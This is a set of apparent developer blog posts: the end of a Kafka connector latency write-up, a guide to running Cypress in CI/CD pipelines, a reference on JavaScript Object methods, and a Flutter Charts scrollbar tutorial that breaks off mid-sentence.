[tasks.max](https://docs.confluent.io/platform/current/installation/configuration/connect/sink-connect-configs.html#tasks-max) option in our Kafka Connector configuration. The `tasks.max` setting controls the maximum number of tasks that the connector can run concurrently. The [tasks](https://docs.confluent.io/platform/current/connect/index.html#connect-tasks) are essentially consumer threads that receive partitions to read from. Our hypothesis was that adjusting this parameter could help us achieve lower latency by running several tasks concurrently. During our tests, we varied the `tasks.max` value and monitored the resulting latency. Interestingly, we found that the lowest latency was consistently achieved when using a single task. Running multiple tasks did not significantly improve, and in some cases even increased, the latency due to the overhead of managing concurrent processes and potential contention for resources. This outcome suggested that the process of sending data into the Ably was the primary factor influencing latency. ### Message converters In our pursuit of reducing latency, we decided to avoid using complicated converters with schema validation. While these converters ensure data consistency and integrity, they introduce significant overhead due to serialization and deserialization. Instead, we opted for the built-in string converter, which transfers data as text. By using the string converter, we sent messages in JSON format directly to Ably. This approach proved to be highly efficient, since Ably natively supports JSON, and that minimized the overhead associated with serialization and deserialization. ### Improving latency with Ably Connector solutions After thoroughly exploring built-in Kafka Connector configurations to reduce latency, we turned our attention to optimizing the Kafka Connector itself. First we focused on the internal batching mechanism of the Ably Kafka Connector. Our goal was to reduce the number of requests sent to Ably, thereby improving performance. ### Experimenting with batching intervals We conducted experiments with different batching intervals, ranging from 0ms (no batching) to 100ms, using the `batchExecutionMaxBufferSizeMs` option. The objective was to find an optimal batching interval that could potentially reduce the request frequency without adversely affecting latency. Our tests revealed that even small batching intervals, such as 20ms, increased latency in both the p50 and p99 percentiles across our scenarios. Specifically, we observed that: - **0ms (no batching):** This configuration yielded the lowest latency, as messages were sent individually without any delay. - **20ms batching:** Despite the minimal delay, there was a noticeable increase in latency, which impacted both the median (p50) and the higher percentile (p99) latencies. - **100ms batching:** The latency continued to increase significantly, reinforcing that batching was not beneficial for our use case. These results indicated that for our specific requirements and testing scenarios, avoiding batching altogether was the most effective approach to maintaining low latency. By sending messages immediately without batching, we minimized the delay introduced by waiting for additional messages to accumulate. ### Internal Connector parallelism Next, we examined the internal thread pool of the Ably Kafka Connector. We observed that messages were often blocked, waiting for previous messages or batches to be sent to Ably. The Ably Kafka Connector has a special option to control thread pool size called `batchExecutionThreadPoolSize`. To address this, we dramatically increased the number of threads from 1 to 1,000 in our tests. This change significantly decreased latency, since it allowed more messages to be processed in parallel. #### Trade-offs and challenges However, this approach came with a trade-off: we could no longer guarantee message ordering when publish requests to Ably were executed in parallel. At Ably, we recognize the critical importance of maintaining message order in realtime data processing. (Many applications rely on messages being processed in the correct sequence to function properly. Therefore, though it would increase latency, `batchExecutionThreadPoolSize` can be set to `1` to guarantee message ordering if absolutely required.) #### Future directions Looking ahead, our focus is on developing solutions that increase parallelism without disrupting message order. We understand that maintaining the correct sequence of messages is crucial for various applications. We are actively exploring several strategies to overcome this limitation and will share our findings soon. ## How our Ably Kafka Connector insights apply elsewhere The insights and optimizations we explored are not limited to the Ably Kafka Connector; they can be applied broadly to any Kafka Connector to improve performance and reduce latency. Here are some general principles and strategies that can be universally beneficial: ### Understanding and optimizing built-in Kafka configuration **1. Partitions and tasks management:** - **Partitions:** Carefully consider the number of partitions. While increasing partitions can enhance parallel processing, it can also introduce complexity and overhead. - **Tasks:** Adjusting the tasks.max setting can help balance concurrency and resource utilization. Our research showed that using a single task minimized latency in our scenario, but this might vary depending on the specific use case. **2. Simple converters:** Using simpler converters, such as the built-in String converter, can reduce the overhead associated with serialization and deserialization. This approach is particularly effective when the data format, like JSON, is natively supported by the target system. ### Optimizing connector-specific settings **1. Batching mechanisms:** While batching can reduce the number of requests sent to external systems, our findings indicate that even small batching intervals can increase latency. Evaluate the impact of batching on latency and throughput carefully. **2. Thread pool configuration:** Increasing the number of threads in the connector’s internal thread pool can significantly reduce latency by allowing more messages to be processed in parallel. However, be mindful of the trade-offs, such as potential issues with message ordering. Although these settings are specific to the Ably Kafka Connector, similar options often exist in other Kafka Sink Connectors. Adjusting batch sizes, thread pools, and other configuration parameters can be effective ways to optimize performance. ## Conclusion Through our experiments with the Ably Kafka Connector, we have successfully achieved impressive latency metrics. With a moderate message load of approximately 2,400 messages per second, we observed a median (p50) latency of around 100ms and a 99th percentile (p99) latency of approximately 150ms. These numbers reflect the total time it takes for data to travel from the publisher to the Kafka cluster, within the Kafka cluster itself, and from the Kafka Connector to the Ably service.
ttypic
1,921,175
Integrating Cypress with CI/CD Pipelines: A Step-by-Step Guide
Introduction Continuous Integration (CI) and Continuous Deployment (CD) are essential...
0
2024-07-13T05:17:46
https://dev.to/aswani25/integrating-cypress-with-cicd-pipelines-a-step-by-step-guide-1kck
webdev, javascript, testing, cypress
## Introduction Continuous Integration (CI) and Continuous Deployment (CD) are essential practices in modern software development. They ensure that code changes are automatically tested and deployed, leading to faster development cycles and higher quality software. Cypress, a powerful end-to-end testing framework, can be seamlessly integrated into CI/CD pipelines to automate the testing process. In this post, we'll explore how to integrate Cypress with popular CI/CD tools, providing a step-by-step guide to set up and configure your pipeline. ## Why Integrate Cypress with CI/CD? Integrating Cypress with CI/CD offers several benefits: 1. **Automated Testing:** Automatically run your tests on every code change, ensuring that your application remains stable. 2. **Fast Feedback:** Quickly identify and fix issues by receiving immediate feedback on code changes. 3. **Consistency:** Ensure consistent testing environments across different machines. 4. **Scalability:** Easily scale your testing efforts by integrating with various CI/CD tools and services. ## Prerequisites Before we begin, ensure you have the following: - A Cypress project set up (if not, follow the official Cypress documentation). - A repository on GitHub, GitLab, Bitbucket, or another version control system. - Basic knowledge of CI/CD concepts. ## Integrating Cypress with GitHub Actions GitHub Actions is a popular CI/CD tool that integrates seamlessly with GitHub repositories. Follow these steps to integrate Cypress with GitHub Actions: **Step 1: Create a GitHub Actions Workflow** In your repository, create a directory named `.github/workflows` if it doesn't already exist. Inside this directory, create a file named `cypress.yml`: ```yaml name: Cypress Tests on: [push, pull_request] jobs: cypress-run: runs-on: ubuntu-latest steps: - name: Checkout repository uses: actions/checkout@v2 - name: Setup Node.js uses: actions/setup-node@v2 with: node-version: '14' - name: Install dependencies run: npm install - name: Run Cypress tests run: npx cypress run ``` **Step 2: Commit and Push** Commit the `cypress.yml` file to your repository and push it to GitHub: ```bash git add .github/workflows/cypress.yml git commit -m "Add Cypress CI workflow" git push origin main ``` GitHub Actions will automatically detect the workflow file and run Cypress tests on every push and pull request. ## Integrating Cypress with GitLab CI/CD GitLab CI/CD is another powerful CI/CD tool that integrates well with GitLab repositories. Follow these steps to integrate Cypress with GitLab CI/CD: **Step 1:** Create a GitLab CI/CD Pipeline In your repository, create a file named `.gitlab-ci.yml`: ```yaml stages: - test cypress_tests: image: cypress/base:14.16.0 stage: test script: - npm install - npx cypress run artifacts: when: always paths: - cypress/screenshots - cypress/videos reports: junit: - cypress/results/junit-report.xml ``` **Step 2:** Commit and Push Commit the `.gitlab-ci.yml` file to your repository and push it to GitLab: ```bash git add .gitlab-ci.yml git commit -m "Add Cypress CI pipeline" git push origin main ``` GitLab CI/CD will automatically detect the pipeline file and run Cypress tests on every push. ## Integrating Cypress with CircleCI CircleCI is a widely used CI/CD tool that supports a variety of configurations. Follow these steps to integrate Cypress with CircleCI: **Step 1:** Create a CircleCI Configuration In your repository, create a directory named `.circleci` if it doesn't already exist. Inside this directory, create a file named `config.yml`: ```yaml version: 2.1 jobs: cypress: docker: - image: cypress/base:14.16.0 steps: - checkout - run: name: Install dependencies command: npm install - run: name: Run Cypress tests command: npx cypress run workflows: version: 2 test: jobs: - cypress ``` **Step 2:** Commit and Push Commit the `config.yml` file to your repository and push it to CircleCI: ```bash git add .circleci/config.yml git commit -m "Add CircleCI Cypress configuration" git push origin main ``` CircleCI will automatically detect the configuration file and run Cypress tests on every push. ## Best Practices for CI/CD Integration 1. **Parallelization:** Use parallelization to speed up test execution by splitting tests across multiple CI workers. 2. **Artifacts:** Save test artifacts (e.g., screenshots, videos) for debugging purposes. 3. **Environment Variables:** Use environment variables to manage sensitive data and configurations. 4. **Notifications:** Set up notifications to alert your team of test failures. ## Conclusion Integrating Cypress with CI/CD pipelines is a powerful way to automate your testing process, ensuring that your application remains stable and reliable. By following the steps outlined in this guide, you can seamlessly integrate Cypress with popular CI/CD tools like GitHub Actions, GitLab CI/CD, and CircleCI. Embrace the power of automation and enhance your development workflow with Cypress and CI/CD. Happy testing!
aswani25
1,921,178
A Guide to Master JavaScript-Objects
Objects are a fundamental part of JavaScript, serving as the backbone for storing and managing data....
28,049
2024-07-15T13:09:00
https://dev.to/imsushant12/a-guide-to-master-javascript-objects-362b
webdev, javascript, beginners, programming
Objects are a fundamental part of JavaScript, serving as the backbone for storing and managing data. An object is a collection of properties, and each property is an association between a key (or name) and a value. Understanding how to create, manipulate, and utilize objects is crucial for any JavaScript developer. In this article, we’ll explore the various object functions in JavaScript, providing detailed explanations, examples, and comments to help you master them. ### Introduction to Objects in JavaScript In JavaScript, objects are used to store collections of data and more complex entities. They are created using object literals or the `Object` constructor. ```javascript // Using object literals let person = { name: "John", age: 30, city: "New York" }; // Using the Object constructor let person = new Object(); person.name = "John"; person.age = 30; person.city = "New York"; ``` ### Object Properties - **`Object.prototype`**: Every JavaScript object inherits properties and methods from its prototype. ```javascript let obj = {}; console.log(obj.__proto__ === Object.prototype); // Output: true ``` ### Object Methods #### 1. `Object.assign()` Copies the values of all enumerable own properties from one or more source objects to a target object. It returns the target object. ```javascript let target = {a: 1}; let source = {b: 2, c: 3}; Object.assign(target, source); console.log(target); // Output: {a: 1, b: 2, c: 3} ``` #### 2. `Object.create()` Creates a new object with the specified prototype object and properties. ```javascript let person = { isHuman: false, printIntroduction: function() { console.log(`My name is ${this.name}. Am I human? ${this.isHuman}`); } }; let me = Object.create(person); me.name = "Matthew"; me.isHuman = true; me.printIntroduction(); // Output: My name is Matthew. Am I human? true ``` #### 3. `Object.defineProperties()` Defines new or modifies existing properties directly on an object, returning the object. ```javascript let obj = {}; Object.defineProperties(obj, { property1: { value: true, writable: true }, property2: { value: "Hello", writable: false } }); console.log(obj); // Output: { property1: true, property2: 'Hello' } ``` #### 4. `Object.defineProperty()` Defines a new property directly on an object or modifies an existing property and returns the object. ```javascript let obj = {}; Object.defineProperty(obj, 'property1', { value: 42, writable: false }); console.log(obj.property1); // Output: 42 obj.property1 = 77; // No error thrown, but the property is not writable console.log(obj.property1); // Output: 42 ``` #### 5. `Object.entries()` Returns an array of a given object's own enumerable string-keyed property [key, value] pairs. ```javascript let obj = {a: 1, b: 2, c: 3}; console.log(Object.entries(obj)); // Output: [['a', 1], ['b', 2], ['c', 3]] ``` #### 6. `Object.freeze()` Freezes an object. A frozen object can no longer be changed; freezing an object prevents new properties from being added to it, existing properties from being removed, and prevents the values of existing properties from being changed. ```javascript let obj = {prop: 42}; Object.freeze(obj); obj.prop = 33; // Fails silently in non-strict mode console.log(obj.prop); // Output: 42 ``` #### 7. `Object.fromEntries()` Transforms a list of key-value pairs into an object. ```javascript let entries = new Map([['foo', 'bar'], ['baz', 42]]); let obj = Object.fromEntries(entries); console.log(obj); // Output: { foo: 'bar', baz: 42 } ``` #### 8. `Object.getOwnPropertyDescriptor()` Returns a property descriptor for an own property (that is, one directly present on an object and not in the object's prototype chain) of a given object. ```javascript let obj = {property1: 42}; let descriptor = Object.getOwnPropertyDescriptor(obj, 'property1'); console.log(descriptor); // Output: { value: 42, writable: true, enumerable: true, configurable: true } ``` #### 9. `Object.getOwnPropertyDescriptors()` Returns an object containing all own property descriptors of an object. ```javascript let obj = {property1: 42}; let descriptors = Object.getOwnPropertyDescriptors(obj); console.log(descriptors); /* Output: { property1: { value: 42, writable: true, enumerable: true, configurable: true } } */ ``` #### 10. `Object.getOwnPropertyNames()` Returns an array of all properties (including non-enumerable properties except for those which use Symbol) found directly upon a given object. ```javascript let obj = {a: 1, b: 2, c: 3}; let props = Object.getOwnPropertyNames(obj); console.log(props); // Output: ['a', 'b', 'c'] ``` #### 11. `Object.getOwnPropertySymbols()` Returns an array of all symbol properties found directly upon a given object. ```javascript let obj = {}; let sym = Symbol('foo'); obj[sym] = 'bar'; let symbols = Object.getOwnPropertySymbols(obj); console.log(symbols); // Output: [Symbol(foo)] ``` #### 12. `Object.getPrototypeOf()` Returns the prototype (i.e., the value of the internal `[[Prototype]]` property) of the specified object. ```javascript let proto = {}; let obj = Object.create(proto); console.log(Object.getPrototypeOf(obj) === proto); // Output: true ``` #### 13. `Object.is()` Determines whether two values are the same value. ```javascript console.log(Object.is('foo', 'foo')); // Output: true console.log(Object.is({}, {})); // Output: false ``` #### 14. `Object.isExtensible()` Determines if extending of an object is allowed. ```javascript let obj = {}; console.log(Object.isExtensible(obj)); // Output: true Object.preventExtensions(obj); console.log(Object.isExtensible(obj)); // Output: false ``` #### 15. `Object.isFrozen()` Determines if an object is frozen. ```javascript let obj = {}; console.log(Object.isFrozen(obj)); // Output: false Object.freeze(obj); console.log(Object.isFrozen(obj)); // Output: true ``` #### 16. `Object.isSealed()` Determines if an object is sealed. ```javascript let obj = {}; console.log(Object.isSealed(obj)); // Output: false Object.seal(obj); console.log(Object.isSealed(obj)); // Output: true ``` #### 17. `Object.keys()` Returns an array of a given object's own enumerable property names, iterated in the same order that a normal loop would. ```javascript let obj = {a: 1, b: 2, c: 3}; console.log(Object.keys(obj)); // Output: ['a', 'b', 'c'] ``` #### 18. `Object.preventExtensions()` Prevents any extensions of an object. ```javascript let obj = {}; Object.preventExtensions(obj); obj.newProp = 'test'; // Throws an error in strict mode console.log(obj.newProp); // Output: undefined ``` #### 19. `Object.seal()` Seals an object, preventing new properties from being added to it and marking all existing properties as non-configurable. Values of present properties can still be changed as long as they are writable. ```javascript let obj = {property1: 42}; Object.seal(obj); obj.property1 = 33; delete obj.property1; // Throws an error in strict mode console.log(obj.property1); // Output: 33 ``` #### 20. `Object.setPrototypeOf()` Sets the prototype (i.e., the internal `[[Prototype]]` property) of a specified object to another object or `null`. ```javascript let proto = {}; let obj = {}; Object.setPrototypeOf(obj, proto); console.log(Object.getPrototypeOf(obj) === proto); // Output: true ``` #### 21. `Object.values()` Returns an array of a given object's own enumerable property values, in the same order as that provided by a for...in loop. ```javascript let obj = {a: 1, b: 2, c: 3}; console.log(Object.values(obj)); // Output: [1, 2, 3] ``` ### Practical Examples #### Example 1: Cloning an Object Using `Object.assign()` to clone an object. ```javascript let obj = {a: 1, b: 2}; let clone = Object.assign({}, obj); console.log(clone); // Output: {a: 1, b: 2} ``` #### Example 2: Merging Objects Using `Object.assign()` to merge objects. ```javascript let obj1 = {a: 1, b: 2}; let obj2 = {b: 3, c: 4}; let merged = Object.assign({}, obj1, obj2); console.log(merged); // Output: {a: 1, b: 3, c: 4} ``` #### Example 3: Creating an Object with a Specified Prototype Using `Object.create()` to create an object with a specified prototype. ```javascript let proto = {greet: function() { console.log("Hello!"); }}; let obj = Object.create(proto); obj.greet(); // Output: Hello! ``` #### Example 4: Defining Immutable Properties Using `Object.defineProperty()` to define immutable properties. ```javascript let obj = {}; Object.defineProperty(obj, 'immutableProp', { value: 42, writable: false }); console.log(obj.immutableProp); // Output: 42 obj.immutableProp = 77; // Throws an error in strict mode console.log(obj.immutableProp); // Output: 42 ``` #### Example 5: Converting an Object to an Array Using `Object.entries()` to convert an object to an array of key-value pairs. ```javascript let obj = {a: 1, b: 2, c: 3}; let entries = Object.entries(obj); console.log(entries); // Output: [['a', 1], ['b', 2], ['c', 3]] ``` ### Conclusion Objects are a core component of JavaScript, offering a flexible way to manage and manipulate data. By mastering object functions, you can perform complex operations with ease and write more efficient and maintainable code. This comprehensive guide has covered the most important object functions in JavaScript, complete with detailed examples and explanations. Practice using these functions and experiment with different use cases to deepen your understanding and enhance your coding skills.
imsushant12
1,921,199
How to add a scrollbar to Syncfusion Flutter Charts
TL;DR: Learn to add scrollbars to Syncfusion Flutter Charts using the Range Slider and Range Selector...
0
2024-07-17T16:14:02
https://www.syncfusion.com/blogs/post/adding-scrollbar-in-flutter-charts
flutter, chart, mobile, desktop
--- title: How to add a scrollbar to Syncfusion Flutter Charts published: true date: 2024-07-12 09:46:37 UTC tags: flutter, chart, mobile, desktop canonical_url: https://www.syncfusion.com/blogs/post/adding-scrollbar-in-flutter-charts cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tmxcitsew4651of8kzqg.png --- **TL;DR:** Learn to add scrollbars to Syncfusion Flutter Charts using the Range Slider and Range Selector widgets. This guide provides step-by-step instructions and code examples to enhance chart navigation. Perfect for seamless zooming and panning. Check it out! Syncfusion [Flutter Charts](https://www.syncfusion.com/flutter-widgets/flutter-charts "Flutter Charts") contains a rich gallery of 30+ charts and graphs, ranging from line to financial charts, that cater to all charting scenarios. In this blog, we will explore how to add a scrollbar in Flutter Charts to track the zoom and pan progress and its limits. The scrollbar feature is not built into our Flutter Charts; however, we can add it using the [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") and [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") widgets. Let’s walk through the steps to achieve the same. ## Adding a mini-map scrollbar The [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") widget is used to select a range of values between the set minimum and maximum values, and it can accept any widget as its child. One unique feature of the **SfRangeSelector** is its ability to map the range selection in [SfCartesianChart](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart-class.html "SfCartesianChart class for Flutter"), making it function as a mini-map scrollbar. This is achieved through the use of the [RangeController](https://pub.dev/documentation/syncfusion_flutter_core/latest/core/RangeController-class.html "RangeController class for Flutter"). The **SfRangeSelector** has a controller property of type **RangeController**, which updates whenever the range of the SfRangeSelector changes through interaction. On the other hand, the **SfCartesianChart** supports a built-in option to listen to and update the RangeController through the **rangeController** property of the [Numeric](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/NumericAxis-class.html "NumericAxis class for Flutter") and [DateTime](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/DateTimeAxis-class.html "DateTimeAxis class for Flutter") axes. Whenever the range of the [CartesianSeries](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianSeries-class.html "CartesianSeries<T, D> class for Flutter") changes due to zooming, panning, or direct range-related APIs, the **RangeController** is updated internally in the Charts, similar to the **SfRangeSelector**. The **RangeController** is a notifier to which the chart and range selector listen. Therefore, whenever the start and end values change in the **RangeController**, the chart and range selector update themselves. Let’s create a chart and initialize the data source. Here, I have currently prepared a working sample with random data. ```csharp num _yValue() { if (_random.nextDouble() > 0.5) { _baseValue += _random.nextDouble(); return _baseValue; } else { _baseValue -= _random.nextDouble(); return _baseValue; } } @override void initState() { DateTime date = DateTime(2020); _chartData = List.generate(_dataCount + 1, (int index) { final List<num> values = [_yValue(), _yValue(), _yValue(), _yValue()]; values.sort(); return ChartData( x: date.add(Duration(days: index)), high: values[0], low: values[3], open: values[1], close: values[2], ); }); _startRange = _chartData[0].x; _endRange = _chartData[_dataCount].x; _rangeController = RangeController( start: _startRange, end: _endRange, ); super.initState(); } @override Widget build(BuildContext context) { ... SfCartesianChart( margin: EdgeInsets.zero, primaryXAxis: const DateTimeAxis(), primaryYAxis: const NumericAxis( opposedPosition: true, ), series: <CartesianSeries<ChartData, DateTime>>[ CandleSeries( dataSource: _chartData, xValueMapper: (ChartData data, int index) => data.x, highValueMapper: (ChartData data, int index) => data.high, lowValueMapper: (ChartData data, int index) => data.low, openValueMapper: (ChartData data, int index) => data.open, closeValueMapper: (ChartData data, int index) => data.close, ), ], ), ... } ``` The y-axis range will be calculated from 0 as the default range padding is [ChartRangePadding.normal](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartRangePadding.html#normal "ChartRangePadding.normal property for Flutter"). Set the range padding of the [NumericAxis](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/NumericAxis-class.html "NumericAxis class for Flutter") to [ChartRangePadding.round](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartRangePadding.html#round "ChartRangePadding.round property for Flutter"), which calculates and displays the y-axis range only for the available data points. ```csharp primaryYAxis: const NumericAxis( ... rangePadding: ChartRangePadding.round, ) ``` Add the [ZoomPanBehavior](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ZoomPanBehavior-class.html "ZoomPanBehavior class for Flutter") to zoom and pan the chart. Here, the zoom mode is set to **X** because the range selector has no vertical orientation, so we can use it for one-direction(horizontal) zooming. ```csharp late ZoomPanBehavior _zoomPanBehavior; @override void initState() { _zoomPanBehavior = ZoomPanBehavior( enablePanning: true, zoomMode: ZoomMode.x, ); ... } SfCartesianChart( ... zoomPanBehavior: _zoomPanBehavior, ... ) ``` Now, create the [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") and set the min and max values from the chart data source. Since the **SfRangeSelector** does not have built-in auto interval calculation support, we need to set the [interval](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/interval.html "interval property for Flutter"), [dateFormat](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/dateFormat.html "dateFormat property for Flutter"), and [dateIntervalType](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/dateIntervalType.html "dateIntervalType property for Flutter") properties manually. In the following code example, we’ll customize the **Jan** label with its year using the [labelFormatterCallback](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/labelFormatterCallback.html "labelFormatterCallback property for Flutter") event for better visual appeal. Since the **SfRangeSelector** acts as a mini-map, we can add any cartesian series (based on need) as its child and map the same data source used above. ```csharp SfRangeSelectorTheme( data: SfRangeSelectorThemeData( thumbRadius: 0, overlayRadius: 0, activeRegionColor: colorScheme.primary.withOpacity(0.12), inactiveRegionColor: Colors.transparent, ), child: SfRangeSelector( min: _startRange, max: _endRange, showTicks: true, showLabels: true, interval: 1, dateIntervalType: DateIntervalType.months, dateFormat: DateFormat.MMM(), labelPlacement: LabelPlacement.betweenTicks, labelFormatterCallback: (dynamic actualValue, String formattedText) { if (formattedText.contains('Jan')) { final year = DateFormat('yyyy').format(actualValue); return ' $year $formattedText'; } return formattedText; }, child: SfCartesianChart( ... ), ), ) ``` Now, wrap the Flutter Charts and the Range Selector widgets in a [Column](https://api.flutter.dev/flutter/widgets/Column-class.html "Column class for Flutter") widget. Then, create a range controller and assign it to the chart and the range selector. ```csharp RangeController? _rangeController; @override void initState() { ... _rangeController = RangeController( start: _startRange, end: _endRange, ); super.initState(); } @override Widget build(BuildContext context) { ... Column( children: <Widget>[ Expanded( child: SfCartesianChart( margin: EdgeInsets.zero, primaryXAxis: DateTimeAxis( rangeController: _rangeController, ), ... ), ), Container( height: 150, padding: const EdgeInsets.only(bottom: 10), child: SfRangeSelectorTheme( ... child: SfRangeSelector( min: _startRange, max: _endRange, controller: _rangeController, ... ), ), ), ], ) ... } ``` That’s it. Now, whenever the axis range changes in the Flutter Chart, the Range Selector will update accordingly and change the Chart’s visual range through interaction with the Range Selector. Refer to the following image. <figure> <img src="https://www.syncfusion.com/blogs/wp-content/uploads/2024/07/Adding-a-mini-map-scrollbar-in-the-Flutter-Charts.gif" alt="Adding a mini-map scrollbar in the Flutter Charts" style="width:100%"> <figcaption>Adding a mini-map scrollbar in the Flutter Charts</figcaption> </figure> ## Adding a scrollbar on X-axis This can be achieved by using the [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") with an empty [SizedBox](https://api.flutter.dev/flutter/widgets/SizedBox-class.html "SizedBox class for Flutter") as its child and placing it on the x-axis using the Flutter Charts [annotation](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart/annotations.html "annotation property for Flutter") property. Let’s have the actual Chart’s data point range as the range of the SfRangeSelector and make it a scrollbar on the X-axis. To display the default scrollbar UI, remove the thumb and overlay from the SfRangeSelector using the [SfRangeSelectorTheme](https://pub.dev/documentation/syncfusion_flutter_core/latest/theme/SfRangeSelectorTheme-class.html "SfRangeSelectorTheme class for Flutter"). Initialize the data source and find its minimum and maximum values. Set these values as the range for the SfRangeSelector. Refer to the following code example. ```csharp late List<ChartData> _chartData; late DateTime _xScrollbarStartRange; late DateTime _xScrollbarEndRange; RangeController? _xScrollbarController; @override void initState() { ... _xScrollbarStartRange = _chartData[0].x; _xScrollbarEndRange = _chartData[_dataCount].x; _xScrollbarController = RangeController( start: _xScrollbarStartRange, end: _xScrollbarEndRange, ); super.initState(); } SfCartesianChart( ... series: <CartesianSeries<ChartData, DateTime>>[ HiloOpenCloseSeries( dataSource: _chartData, ... ), ], zoomPanBehavior: _zoomPanBehavior, ... ) SfRangeSelectorTheme( data: const SfRangeSelectorThemeData( thumbRadius: 0, overlayRadius: 0, ), child: SfRangeSelector( min: _xScrollbarStartRange, max: _xScrollbarEndRange, child: const SizedBox(height: 0), ), ) ``` Create a range controller and assign it to both the chart’s axis and the range selector so they will map to each other and get updated when the range changes. ```csharp void initState() { ... _xScrollbarController = RangeController( start: _xScrollbarStartRange, end: _xScrollbarEndRange, ); super.initState(); } @override Widget build(BuildContext context) { SfCartesianChart( margin: EdgeInsets.zero, primaryXAxis: DateTimeAxis( rangeController: _xScrollbarController, ), ... ) SfRangeSelector( min: _xScrollbarStartRange, max: _xScrollbarEndRange, controller: _xScrollbarController, showTicks: true, ... ) ``` Now, add an annotation to the chart and place the [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") as a child of the annotation. ```csharp SfCartesianChart( ... annotations: [ CartesianChartAnnotation( widget: SfRangeSelectorTheme( data: const SfRangeSelectorThemeData( thumbRadius: 0, overlayRadius: 0, ), child: SfRangeSelector( min: _xScrollbarStartRange, max: _xScrollbarEndRange, controller: _xScrollbarController, child: const SizedBox(height: 0), ), ), ), ], ) ``` In order to position the range selector on the x-axis, we need to determine the top left position of the x-axis, which is the same as the bottom left position of the plot area. To get the plot area (series) size, write a custom series renderer for the [CartesianSeries](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianSeries-class.html "CartesianSeries<T, D> class for Flutter") and override its [performLayout](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianSeriesRenderer/performLayout.html "performLayout method for Flutter") method. After calling the **super.performLayout** method, you can obtain the size of the series. Refer to the following code example. ```csharp series: <CartesianSeries<ChartData, DateTime>>[ HiloOpenCloseSeries( ... onCreateRenderer: (ChartSeries<ChartData, DateTime> series) { return _HiloOpenCloseSeriesRenderer(this); }, ), ] class _HiloOpenCloseSeriesRenderer extends HiloOpenCloseSeriesRenderer<ChartData, DateTime> { _HiloOpenCloseSeriesRenderer(this._state); final _ChartWithRangeSliderState _state; @override void performLayout() { super.performLayout(); _state._updateScrollBarSize(size); } } ``` After obtaining the size, modify the annotation position through the [postFrameCallback](https://api.flutter.dev/flutter/scheduler/SchedulerBinding/addPostFrameCallback.html "addPostFrameCallback method for Flutter"). When using the series’ bottom left position as the annotation’s x and y coordinates, the annotation will be placed in the center of the given position by default because the default [horizontalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/horizontalAlignment.html "horizontalAlignment property for Flutter") and [verticalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/verticalAlignment.html "verticalAlignment property for Flutter") of the annotation is [center](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartAlignment.html#center "center value for ChartAlignment enum in Flutter"). However, in our case, the annotation must consider the position as center left, which can be done by setting the chart’s [horizontalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/horizontalAlignment.html "horizontalAlignment property for Flutter") as [near](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartAlignment.html#near "near value for ChartAlignment enum in Flutter") and [verticalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/verticalAlignment.html "verticalAlignment property for Flutter") as [center](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartAlignment.html#center "ChartAlignment enum methods for Flutter"). Despite this adjustment, the scrollbar still did not stretch to the entire axis length, so set the series width to the scrollbar using the [SizedBox](https://api.flutter.dev/flutter/widgets/SizedBox-class.html "SizedBox class for Flutter"). Refer to the following code example. ```csharp Size _scrollbarSize = Size.zero; Offset _verticalScrollbarStart = Offset.zero; void _updateScrollBarSize(Size size) { SchedulerBinding.instance.addPostFrameCallback((Duration timeStamp) { if (size != _scrollbarSize) { setState(() { _scrollbarSize = size; _horizontalScrollbarStart = Offset(0, size.height); }); } }); } SfCartesianChart( ... annotations: [ CartesianChartAnnotation( x: _horizontalScrollbarStart.dx, y: _horizontalScrollbarStart.dy, coordinateUnit: CoordinateUnit.logicalPixel, horizontalAlignment: ChartAlignment.near, widget: SizedBox( width: _scrollbarSize.width, ... ), ), ], ); ``` ## Adding a scrollbar on Y-axis This can be achieved using the vertical [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") widget as an annotation on the Flutter Charts widget. We have used the actual chart data point range for the x-axis scrollbar range; now, we will implement a different method for the y-axis scrollbar. Let’s assume the scrollbar’s minimum value is 0 and the maximum is 1. Based on the range selected in the chart, the scrollbar range will need to be updated. Let’s explore how to accomplish this. To display the actual scrollbar UI, remove the thumb and overlay from the 